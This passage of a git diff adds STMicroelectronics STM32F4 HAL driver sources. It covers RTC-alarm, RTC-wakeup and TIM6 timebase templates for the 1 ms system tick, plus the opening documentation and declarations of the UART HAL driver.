+ __HAL_RTC_WRITEPROTECTION_ENABLE(&hRTC_Handle); + + /* Enable the RTC Alarm Interrupt */ + HAL_NVIC_EnableIRQ(RTC_Alarm_IRQn); + + /* Configure the SysTick IRQ priority */ + if (TickPriority < (1UL << __NVIC_PRIO_BITS)) + { + HAL_NVIC_SetPriority(RTC_Alarm_IRQn, TickPriority, 0U); + uwTickPrio = TickPriority; + } + else + { + status = HAL_ERROR; + } + + } + return status; +} + +/** + * @brief Suspend Tick increment. + * @note Disable the tick increment by disabling RTC ALARM interrupt. + * @retval None + */ +void HAL_SuspendTick(void) +{ + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(&hRTC_Handle); + /* Disable RTC ALARM update Interrupt */ + __HAL_RTC_ALARM_DISABLE_IT(&hRTC_Handle, RTC_IT_ALRA); + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(&hRTC_Handle); +} + +/** + * @brief Resume Tick increment. + * @note Enable the tick increment by Enabling RTC ALARM interrupt. + * @retval None + */ +void HAL_ResumeTick(void) +{ + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(&hRTC_Handle); + /* Enable RTC ALARM Update interrupt */ + __HAL_RTC_ALARM_ENABLE_IT(&hRTC_Handle, RTC_IT_ALRA); + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(&hRTC_Handle); +} + +/** + * @brief ALARM A Event Callback in non blocking mode + * @note This function is called when RTC_ALARM interrupt took place, inside + * RTC_ALARM_IRQHandler(). It makes a direct call to HAL_IncTick() to increment + * a global variable "uwTick" used as application time base. + * @param hrtc RTC handle + * @retval None + */ +void HAL_RTC_AlarmAEventCallback(RTC_HandleTypeDef *hrtc) +{ + __IO uint32_t counter = 0U; + + HAL_IncTick(); + + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + /* Set the Initialization mode */ + hrtc->Instance->ISR = (uint32_t)RTC_INIT_MASK; + + while((hrtc->Instance->ISR & RTC_ISR_INITF) == (uint32_t)RESET) + { + if(counter++ == (SystemCoreClock /48U)) /* Timeout = ~ 1s */ + { + break; + } + } + + hrtc->Instance->DR = 0U; + hrtc->Instance->TR = 0U; + + hrtc->Instance->ISR &= (uint32_t)~RTC_ISR_INIT; + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); +} + +/** + * @brief This function handles RTC ALARM interrupt request. + * @retval None + */ +void RTC_Alarm_IRQHandler(void) +{ + HAL_RTC_AlarmIRQHandler(&hRTC_Handle); +} + +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_timebase_rtc_wakeup_template.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_timebase_rtc_wakeup_template.c new file mode 100644 index 000000000..01663e75d --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_timebase_rtc_wakeup_template.c @@ -0,0 +1,292 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_timebase_rtc_wakeup_template.c + * @author MCD Application Team + * @brief HAL time base based on the hardware RTC_WAKEUP Template. + * + * This file overrides the native HAL time base functions (defined as weak) + * to use the RTC WAKEUP for the time base generation: + * + Intializes the RTC peripheral and configures the wakeup timer to be + * incremented each 1ms + * + The wakeup feature is configured to assert an interrupt each 1ms + * + HAL_IncTick is called inside the HAL_RTCEx_WakeUpTimerEventCallback + * + HSE (default), LSE or LSI can be selected as RTC clock source + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + This file must be copied to the application folder and modified as follows: + (#) Rename it to 'stm32f4xx_hal_timebase_rtc_wakeup.c' + (#) Add this file and the RTC HAL drivers to your project and uncomment + HAL_RTC_MODULE_ENABLED define in stm32f4xx_hal_conf.h + + [..] + (@) HAL RTC alarm and HAL RTC wakeup drivers cant be used with low power modes: + The wake up capability of the RTC may be intrusive in case of prior low power mode + configuration requiring different wake up sources. + Application/Example behavior is no more guaranteed + (@) The stm32f4xx_hal_timebase_tim use is recommended for the Applications/Examples + requiring low power modes + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup HAL_TimeBase_RTC_WakeUp_Template HAL TimeBase RTC WakeUp Template + * @{ + */ + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ + +/* Uncomment the line below to select the appropriate RTC Clock source for your application: + + RTC_CLOCK_SOURCE_HSE: can be selected for applications requiring timing precision. + + RTC_CLOCK_SOURCE_LSE: can be selected for applications with low constraint on timing + precision. + + RTC_CLOCK_SOURCE_LSI: can be selected for applications with low constraint on timing + precision. + */ +#define RTC_CLOCK_SOURCE_HSE +/* #define RTC_CLOCK_SOURCE_LSE */ +/* #define RTC_CLOCK_SOURCE_LSI */ + +#ifdef RTC_CLOCK_SOURCE_HSE + #define RTC_ASYNCH_PREDIV 99U + #define RTC_SYNCH_PREDIV 9U + #define RCC_RTCCLKSOURCE_1MHZ ((uint32_t)((uint32_t)RCC_BDCR_RTCSEL | (uint32_t)((HSE_VALUE/1000000U) << 16U))) +#else /* RTC_CLOCK_SOURCE_LSE || RTC_CLOCK_SOURCE_LSI */ + #define RTC_ASYNCH_PREDIV 0U + #define RTC_SYNCH_PREDIV 31U +#endif /* RTC_CLOCK_SOURCE_HSE */ + +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +RTC_HandleTypeDef hRTC_Handle; + +/* Private function prototypes -----------------------------------------------*/ +void RTC_WKUP_IRQHandler(void); + +/* Private functions ---------------------------------------------------------*/ + +/** + * @brief This function configures the RTC_WKUP as a time base source. + * The time source is configured to have 1ms time base with a dedicated + * Tick interrupt priority. + * Wakeup Time base = ((RTC_ASYNCH_PREDIV + 1) * (RTC_SYNCH_PREDIV + 1)) / RTC_CLOCK + = 1ms + * Wakeup Time = WakeupTimebase * WakeUpCounter (0 + 1) + = 1 ms + * @note This function is called automatically at the beginning of program after + * reset by HAL_Init() or at any time when clock is configured, by HAL_RCC_ClockConfig(). + * @param TickPriority Tick interrupt priority. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_InitTick (uint32_t TickPriority) +{ + __IO uint32_t counter = 0U; + + RCC_OscInitTypeDef RCC_OscInitStruct; + RCC_PeriphCLKInitTypeDef PeriphClkInitStruct; + HAL_StatusTypeDef status; + +#ifdef RTC_CLOCK_SOURCE_LSE + /* Configue LSE as RTC clock soucre */ + RCC_OscInitStruct.OscillatorType = RCC_OSCILLATORTYPE_LSE; + RCC_OscInitStruct.PLL.PLLState = RCC_PLL_NONE; + RCC_OscInitStruct.LSEState = RCC_LSE_ON; + PeriphClkInitStruct.RTCClockSelection = RCC_RTCCLKSOURCE_LSE; +#elif defined (RTC_CLOCK_SOURCE_LSI) + /* Configue LSI as RTC clock soucre */ + RCC_OscInitStruct.OscillatorType = RCC_OSCILLATORTYPE_LSI; + RCC_OscInitStruct.PLL.PLLState = RCC_PLL_NONE; + RCC_OscInitStruct.LSIState = RCC_LSI_ON; + PeriphClkInitStruct.RTCClockSelection = RCC_RTCCLKSOURCE_LSI; +#elif defined (RTC_CLOCK_SOURCE_HSE) + /* Configue HSE as RTC clock soucre */ + RCC_OscInitStruct.OscillatorType = RCC_OSCILLATORTYPE_HSE; + RCC_OscInitStruct.PLL.PLLState = RCC_PLL_NONE; + RCC_OscInitStruct.HSEState = RCC_HSE_ON; + /* Ensure that RTC is clocked by 1MHz */ + PeriphClkInitStruct.RTCClockSelection = RCC_RTCCLKSOURCE_1MHZ; +#else +#error Please select the RTC Clock source +#endif /* RTC_CLOCK_SOURCE_LSE */ + + status = HAL_RCC_OscConfig(&RCC_OscInitStruct); + if (status == HAL_OK) + { + PeriphClkInitStruct.PeriphClockSelection = RCC_PERIPHCLK_RTC; + status = HAL_RCCEx_PeriphCLKConfig(&PeriphClkInitStruct); + } + if (status == HAL_OK) + { + /* Enable RTC Clock */ + __HAL_RCC_RTC_ENABLE(); + /* The time base should be 1ms + Time base = ((RTC_ASYNCH_PREDIV + 1) * (RTC_SYNCH_PREDIV + 1)) / RTC_CLOCK + HSE as RTC clock + Time base = ((99 + 1) * (9 + 1)) / 1Mhz + = 1ms + LSE as RTC clock + Time base = ((31 + 1) * (0 + 1)) / 32.768Khz + = ~1ms + LSI as RTC clock + Time base = ((31 + 1) * (0 + 1)) / 32Khz + = 1ms + */ + hRTC_Handle.Instance = RTC; + hRTC_Handle.Init.HourFormat = RTC_HOURFORMAT_24; + hRTC_Handle.Init.AsynchPrediv = RTC_ASYNCH_PREDIV; + hRTC_Handle.Init.SynchPrediv = RTC_SYNCH_PREDIV; + hRTC_Handle.Init.OutPut = RTC_OUTPUT_DISABLE; + hRTC_Handle.Init.OutPutPolarity = RTC_OUTPUT_POLARITY_HIGH; + hRTC_Handle.Init.OutPutType = RTC_OUTPUT_TYPE_OPENDRAIN; + status = HAL_RTC_Init(&hRTC_Handle); + } + if (status == HAL_OK) + { + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(&hRTC_Handle); + + /* Disable the Wake-up Timer */ + __HAL_RTC_WAKEUPTIMER_DISABLE(&hRTC_Handle); + + /* In case of interrupt mode is used, the interrupt source must disabled */ + __HAL_RTC_WAKEUPTIMER_DISABLE_IT(&hRTC_Handle, RTC_IT_WUT); + + /* Wait till RTC WUTWF flag is set */ + while (__HAL_RTC_WAKEUPTIMER_GET_FLAG(&hRTC_Handle, RTC_FLAG_WUTWF) == RESET) + { + if (counter++ == (SystemCoreClock / 48U)) + { + status = HAL_ERROR; + } + } + } + if (status == HAL_OK) + { + /* Clear PWR wake up Flag */ + __HAL_PWR_CLEAR_FLAG(PWR_FLAG_WU); + + /* Clear RTC Wake Up timer Flag */ + __HAL_RTC_WAKEUPTIMER_CLEAR_FLAG(&hRTC_Handle, RTC_FLAG_WUTF); + + /* Configure the Wake-up Timer counter */ + hRTC_Handle.Instance->WUTR = 0U; + + /* Clear the Wake-up Timer clock source bits in CR register */ + hRTC_Handle.Instance->CR &= (uint32_t)~RTC_CR_WUCKSEL; + + /* Configure the clock source */ + hRTC_Handle.Instance->CR |= (uint32_t)RTC_WAKEUPCLOCK_CK_SPRE_16BITS; + + /* RTC WakeUpTimer Interrupt Configuration: EXTI configuration */ + __HAL_RTC_WAKEUPTIMER_EXTI_ENABLE_IT(); + + __HAL_RTC_WAKEUPTIMER_EXTI_ENABLE_RISING_EDGE(); + + /* Configure the Interrupt in the RTC_CR register */ + __HAL_RTC_WAKEUPTIMER_ENABLE_IT(&hRTC_Handle,RTC_IT_WUT); + + /* Enable the Wake-up Timer */ + __HAL_RTC_WAKEUPTIMER_ENABLE(&hRTC_Handle); + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(&hRTC_Handle); + + /* Enable the RTC global Interrupt */ + HAL_NVIC_EnableIRQ(RTC_WKUP_IRQn); + + /* Configure the SysTick IRQ priority */ + if (TickPriority < (1UL << __NVIC_PRIO_BITS)) + { + HAL_NVIC_SetPriority(RTC_WKUP_IRQn, TickPriority, 0U); + uwTickPrio = TickPriority; + } + else + { + status = HAL_ERROR; + } + } + return status; +} + +/** + * @brief Suspend Tick increment. + * @note Disable the tick increment by disabling RTC_WKUP interrupt. + * @retval None + */ +void HAL_SuspendTick(void) +{ + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(&hRTC_Handle); + /* Disable WAKE UP TIMER Interrupt */ + __HAL_RTC_WAKEUPTIMER_DISABLE_IT(&hRTC_Handle, RTC_IT_WUT); + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(&hRTC_Handle); +} + +/** + * @brief Resume Tick increment. + * @note Enable the tick increment by Enabling RTC_WKUP interrupt. + * @retval None + */ +void HAL_ResumeTick(void) +{ + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(&hRTC_Handle); + /* Enable WAKE UP TIMER interrupt */ + __HAL_RTC_WAKEUPTIMER_ENABLE_IT(&hRTC_Handle, RTC_IT_WUT); + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(&hRTC_Handle); +} + +/** + * @brief Wake Up Timer Event Callback in non blocking mode + * @note This function is called when RTC_WKUP interrupt took place, inside + * RTC_WKUP_IRQHandler(). It makes a direct call to HAL_IncTick() to increment + * a global variable "uwTick" used as application time base. + * @param hrtc RTC handle + * @retval None + */ +void HAL_RTCEx_WakeUpTimerEventCallback(RTC_HandleTypeDef *hrtc) +{ + HAL_IncTick(); +} + +/** + * @brief This function handles WAKE UP TIMER interrupt request. + * @retval None + */ +void RTC_WKUP_IRQHandler(void) +{ + HAL_RTCEx_WakeUpTimerIRQHandler(&hRTC_Handle); +} + +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_timebase_tim_template.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_timebase_tim_template.c new file mode 100644 index 000000000..da61e9ccb --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_timebase_tim_template.c @@ -0,0 +1,178 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_timebase_tim_template.c + * @author MCD Application Team + * @brief HAL time base based on the hardware TIM Template. + * + * This file overrides the native HAL time base functions (defined as weak) + * the TIM time base: + * + Intializes the TIM peripheral generate a Period elapsed Event each 1ms + * + HAL_IncTick is called inside HAL_TIM_PeriodElapsedCallback ie each 1ms + * + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @addtogroup HAL_TimeBase_TIM + * @{ + */ + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +TIM_HandleTypeDef TimHandle; +/* Private function prototypes -----------------------------------------------*/ +void TIM6_DAC_IRQHandler(void); +/* Private functions ---------------------------------------------------------*/ + +/** + * @brief This function configures the TIM6 as a time base source. + * The time source is configured to have 1ms time base with a dedicated + * Tick interrupt priority. + * @note This function is called automatically at the beginning of program after + * reset by HAL_Init() or at any time when clock is configured, by HAL_RCC_ClockConfig(). + * @param TickPriority Tick interrupt priority. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_InitTick (uint32_t TickPriority) +{ + RCC_ClkInitTypeDef clkconfig; + uint32_t uwTimclock, uwAPB1Prescaler = 0U; + uint32_t uwPrescalerValue = 0U; + uint32_t pFLatency; + HAL_StatusTypeDef status; + + /* Enable TIM6 clock */ + __HAL_RCC_TIM6_CLK_ENABLE(); + + /* Get clock configuration */ + HAL_RCC_GetClockConfig(&clkconfig, &pFLatency); + + /* Get APB1 prescaler */ + uwAPB1Prescaler = clkconfig.APB1CLKDivider; + + /* Compute TIM6 clock */ + if (uwAPB1Prescaler == RCC_HCLK_DIV1) + { + uwTimclock = HAL_RCC_GetPCLK1Freq(); + } + else + { + uwTimclock = 2 * HAL_RCC_GetPCLK1Freq(); + } + + /* Compute the prescaler value to have TIM6 counter clock equal to 1MHz */ + uwPrescalerValue = (uint32_t) ((uwTimclock / 1000000U) - 1U); + + /* Initialize TIM6 */ + TimHandle.Instance = TIM6; + + /* Initialize TIMx peripheral as follow: + + Period = [(TIM6CLK/1000) - 1]. to have a (1/1000) s time base. + + Prescaler = (uwTimclock/1000000 - 1) to have a 1MHz counter clock. + + ClockDivision = 0 + + Counter direction = Up + */ + TimHandle.Init.Period = (1000000U / 1000U) - 1U; + TimHandle.Init.Prescaler = uwPrescalerValue; + TimHandle.Init.ClockDivision = 0U; + TimHandle.Init.CounterMode = TIM_COUNTERMODE_UP; + TimHandle.Init.AutoReloadPreload = TIM_AUTORELOAD_PRELOAD_DISABLE; + status = HAL_TIM_Base_Init(&TimHandle); + if (status == HAL_OK) + { + /* Start the TIM time Base generation in interrupt mode */ + status = HAL_TIM_Base_Start_IT(&TimHandle); + if (status == HAL_OK) + { + /* Enable the TIM6 global Interrupt */ + HAL_NVIC_EnableIRQ(TIM6_DAC_IRQn); + + if (TickPriority < (1UL << __NVIC_PRIO_BITS)) + { + /* Enable the TIM6 global Interrupt */ + HAL_NVIC_SetPriority(TIM6_DAC_IRQn, TickPriority, 0); + uwTickPrio = TickPriority; + } + else + { + status = HAL_ERROR; + } + } + } + + /* Return function status */ + return status; +} + +/** + * @brief Suspend Tick increment. + * @note Disable the tick increment by disabling TIM6 update interrupt. + * @retval None + */ +void HAL_SuspendTick(void) +{ + /* Disable TIM6 update Interrupt */ + __HAL_TIM_DISABLE_IT(&TimHandle, TIM_IT_UPDATE); +} + +/** + * @brief Resume Tick increment. + * @note Enable the tick increment by Enabling TIM6 update interrupt. + * @retval None + */ +void HAL_ResumeTick(void) +{ + /* Enable TIM6 Update interrupt */ + __HAL_TIM_ENABLE_IT(&TimHandle, TIM_IT_UPDATE); +} + +/** + * @brief Period elapsed callback in non blocking mode + * @note This function is called when TIM6 interrupt took place, inside + * HAL_TIM_IRQHandler(). It makes a direct call to HAL_IncTick() to increment + * a global variable "uwTick" used as application time base. + * @param htim TIM handle + * @retval None + */ +void HAL_TIM_PeriodElapsedCallback(TIM_HandleTypeDef *htim) +{ + HAL_IncTick(); +} + +/** + * @brief This function handles TIM interrupt request. + * @retval None + */ +void TIM6_DAC_IRQHandler(void) +{ + HAL_TIM_IRQHandler(&TimHandle); +} + +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_uart.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_uart.c new file mode 100644 index 000000000..5e53813c8 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_uart.c @@ -0,0 +1,3741 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_uart.c + * @author MCD Application Team + * @brief UART HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Universal Asynchronous Receiver Transmitter Peripheral (UART). + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral Control functions + * + Peripheral State and Errors functions + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + The UART HAL driver can be used as follows: + + (#) Declare a UART_HandleTypeDef handle structure (eg. UART_HandleTypeDef huart). + (#) Initialize the UART low level resources by implementing the HAL_UART_MspInit() API: + (##) Enable the USARTx interface clock. + (##) UART pins configuration: + (+++) Enable the clock for the UART GPIOs. + (+++) Configure the UART TX/RX pins as alternate function pull-up. + (##) NVIC configuration if you need to use interrupt process (HAL_UART_Transmit_IT() + and HAL_UART_Receive_IT() APIs): + (+++) Configure the USARTx interrupt priority. + (+++) Enable the NVIC USART IRQ handle. + (##) DMA Configuration if you need to use DMA process (HAL_UART_Transmit_DMA() + and HAL_UART_Receive_DMA() APIs): + (+++) Declare a DMA handle structure for the Tx/Rx stream. + (+++) Enable the DMAx interface clock. + (+++) Configure the declared DMA handle structure with the required + Tx/Rx parameters. + (+++) Configure the DMA Tx/Rx stream. + (+++) Associate the initialized DMA handle to the UART DMA Tx/Rx handle. + (+++) Configure the priority and enable the NVIC for the transfer complete + interrupt on the DMA Tx/Rx stream. + (+++) Configure the USARTx interrupt priority and enable the NVIC USART IRQ handle + (used for last byte sending completion detection in DMA non circular mode) + + (#) Program the Baud Rate, Word Length, Stop Bit, Parity, Hardware + flow control and Mode(Receiver/Transmitter) in the huart Init structure. + + (#) For the UART asynchronous mode, initialize the UART registers by calling + the HAL_UART_Init() API. + + (#) For the UART Half duplex mode, initialize the UART registers by calling + the HAL_HalfDuplex_Init() API. + + (#) For the LIN mode, initialize the UART registers by calling the HAL_LIN_Init() API. + + (#) For the Multi-Processor mode, initialize the UART registers by calling + the HAL_MultiProcessor_Init() API. + + [..] + (@) The specific UART interrupts (Transmission complete interrupt, + RXNE interrupt and Error Interrupts) will be managed using the macros + __HAL_UART_ENABLE_IT() and __HAL_UART_DISABLE_IT() inside the transmit + and receive process. + + [..] + (@) These APIs (HAL_UART_Init() and HAL_HalfDuplex_Init()) configure also the + low level Hardware GPIO, CLOCK, CORTEX...etc) by calling the customized + HAL_UART_MspInit() API. + + ##### Callback registration ##### + ================================== + + [..] + The compilation define USE_HAL_UART_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + + [..] + Use Function HAL_UART_RegisterCallback() to register a user callback. + Function HAL_UART_RegisterCallback() allows to register following callbacks: + (+) TxHalfCpltCallback : Tx Half Complete Callback. + (+) TxCpltCallback : Tx Complete Callback. + (+) RxHalfCpltCallback : Rx Half Complete Callback. + (+) RxCpltCallback : Rx Complete Callback. + (+) ErrorCallback : Error Callback. + (+) AbortCpltCallback : Abort Complete Callback. + (+) AbortTransmitCpltCallback : Abort Transmit Complete Callback. + (+) AbortReceiveCpltCallback : Abort Receive Complete Callback. + (+) MspInitCallback : UART MspInit. + (+) MspDeInitCallback : UART MspDeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + [..] + Use function HAL_UART_UnRegisterCallback() to reset a callback to the default + weak (surcharged) function. + HAL_UART_UnRegisterCallback() takes as parameters the HAL peripheral handle, + and the Callback ID. + This function allows to reset following callbacks: + (+) TxHalfCpltCallback : Tx Half Complete Callback. + (+) TxCpltCallback : Tx Complete Callback. + (+) RxHalfCpltCallback : Rx Half Complete Callback. + (+) RxCpltCallback : Rx Complete Callback. + (+) ErrorCallback : Error Callback. + (+) AbortCpltCallback : Abort Complete Callback. + (+) AbortTransmitCpltCallback : Abort Transmit Complete Callback. + (+) AbortReceiveCpltCallback : Abort Receive Complete Callback. + (+) MspInitCallback : UART MspInit. + (+) MspDeInitCallback : UART MspDeInit. + + [..] + For specific callback RxEventCallback, use dedicated registration/reset functions: + respectively HAL_UART_RegisterRxEventCallback() , HAL_UART_UnRegisterRxEventCallback(). + + [..] + By default, after the HAL_UART_Init() and when the state is HAL_UART_STATE_RESET + all callbacks are set to the corresponding weak (surcharged) functions: + examples HAL_UART_TxCpltCallback(), HAL_UART_RxHalfCpltCallback(). + Exception done for MspInit and MspDeInit functions that are respectively + reset to the legacy weak (surcharged) functions in the HAL_UART_Init() + and HAL_UART_DeInit() only when these callbacks are null (not registered beforehand). + If not, MspInit or MspDeInit are not null, the HAL_UART_Init() and HAL_UART_DeInit() + keep and use the user MspInit/MspDeInit callbacks (registered beforehand). + + [..] + Callbacks can be registered/unregistered in HAL_UART_STATE_READY state only. + Exception done MspInit/MspDeInit that can be registered/unregistered + in HAL_UART_STATE_READY or HAL_UART_STATE_RESET state, thus registered (user) + MspInit/DeInit callbacks can be used during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using HAL_UART_RegisterCallback() before calling HAL_UART_DeInit() + or HAL_UART_Init() function. + + [..] + When The compilation define USE_HAL_UART_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registration feature is not available + and weak (surcharged) callbacks are used. + + [..] + Three operation modes are available within this driver : + + *** Polling mode IO operation *** + ================================= + [..] + (+) Send an amount of data in blocking mode using HAL_UART_Transmit() + (+) Receive an amount of data in blocking mode using HAL_UART_Receive() + + *** Interrupt mode IO operation *** + =================================== + [..] + (+) Send an amount of data in non blocking mode using HAL_UART_Transmit_IT() + (+) At transmission end of transfer HAL_UART_TxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_UART_TxCpltCallback + (+) Receive an amount of data in non blocking mode using HAL_UART_Receive_IT() + (+) At reception end of transfer HAL_UART_RxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_UART_RxCpltCallback + (+) In case of transfer Error, HAL_UART_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_UART_ErrorCallback + + *** DMA mode IO operation *** + ============================== + [..] + (+) Send an amount of data in non blocking mode (DMA) using HAL_UART_Transmit_DMA() + (+) At transmission end of half transfer HAL_UART_TxHalfCpltCallback is executed and user can + add his own code by customization of function pointer HAL_UART_TxHalfCpltCallback + (+) At transmission end of transfer HAL_UART_TxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_UART_TxCpltCallback + (+) Receive an amount of data in non blocking mode (DMA) using HAL_UART_Receive_DMA() + (+) At reception end of half transfer HAL_UART_RxHalfCpltCallback is executed and user can + add his own code by customization of function pointer HAL_UART_RxHalfCpltCallback + (+) At reception end of transfer HAL_UART_RxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_UART_RxCpltCallback + (+) In case of transfer Error, HAL_UART_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_UART_ErrorCallback + (+) Pause the DMA Transfer using HAL_UART_DMAPause() + (+) Resume the DMA Transfer using HAL_UART_DMAResume() + (+) Stop the DMA Transfer using HAL_UART_DMAStop() + + + [..] This subsection also provides a set of additional functions providing enhanced reception + services to user. (For example, these functions allow application to handle use cases + where number of data to be received is unknown). + + (#) Compared to standard reception services which only consider number of received + data elements as reception completion criteria, these functions also consider additional events + as triggers for updating reception status to caller : + (+) Detection of inactivity period (RX line has not been active for a given period). + (++) RX inactivity detected by IDLE event, i.e. RX line has been in idle state (normally high state) + for 1 frame time, after last received byte. + + (#) There are two mode of transfer: + (+) Blocking mode: The reception is performed in polling mode, until either expected number of data is received, + or till IDLE event occurs. Reception is handled only during function execution. + When function exits, no data reception could occur. HAL status and number of actually received data elements, + are returned by function after finishing transfer. + (+) Non-Blocking mode: The reception is performed using Interrupts or DMA. + These API's return the HAL status. + The end of the data processing will be indicated through the + dedicated UART IRQ when using Interrupt mode or the DMA IRQ when using DMA mode. + The HAL_UARTEx_RxEventCallback() user callback will be executed during Receive process + The HAL_UART_ErrorCallback()user callback will be executed when a reception error is detected. + + (#) Blocking mode API: + (+) HAL_UARTEx_ReceiveToIdle() + + (#) Non-Blocking mode API with Interrupt: + (+) HAL_UARTEx_ReceiveToIdle_IT() + + (#) Non-Blocking mode API with DMA: + (+) HAL_UARTEx_ReceiveToIdle_DMA() + + + *** UART HAL driver macros list *** + ============================================= + [..] + Below the list of most used macros in UART HAL driver. + + (+) __HAL_UART_ENABLE: Enable the UART peripheral + (+) __HAL_UART_DISABLE: Disable the UART peripheral + (+) __HAL_UART_GET_FLAG : Check whether the specified UART flag is set or not + (+) __HAL_UART_CLEAR_FLAG : Clear the specified UART pending flag + (+) __HAL_UART_ENABLE_IT: Enable the specified UART interrupt + (+) __HAL_UART_DISABLE_IT: Disable the specified UART interrupt + (+) __HAL_UART_GET_IT_SOURCE: Check whether the specified UART interrupt has occurred or not + + [..] + (@) You can refer to the UART HAL driver header file for more useful macros + + @endverbatim + [..] + (@) Additional remark: If the parity is enabled, then the MSB bit of the data written + in the data register is transmitted but is changed by the parity bit. + Depending on the frame length defined by the M bit (8-bits or 9-bits), + the possible UART frame formats are as listed in the following table: + +-------------------------------------------------------------+ + | M bit | PCE bit | UART frame | + |---------------------|---------------------------------------| + | 0 | 0 | | SB | 8 bit data | STB | | + |---------|-----------|---------------------------------------| + | 0 | 1 | | SB | 7 bit data | PB | STB | | + |---------|-----------|---------------------------------------| + | 1 | 0 | | SB | 9 bit data | STB | | + |---------|-----------|---------------------------------------| + | 1 | 1 | | SB | 8 bit data | PB | STB | | + +-------------------------------------------------------------+ + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup UART UART + * @brief HAL UART module driver + * @{ + */ +#ifdef HAL_UART_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @addtogroup UART_Private_Constants + * @{ + */ +/** + * @} + */ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/** @addtogroup UART_Private_Functions UART Private Functions + * @{ + */ + +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) +void UART_InitCallbacksToDefault(UART_HandleTypeDef *huart); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ +static void UART_EndTxTransfer(UART_HandleTypeDef *huart); +static void UART_EndRxTransfer(UART_HandleTypeDef *huart); +static void UART_DMATransmitCplt(DMA_HandleTypeDef *hdma); +static void UART_DMAReceiveCplt(DMA_HandleTypeDef *hdma); +static void 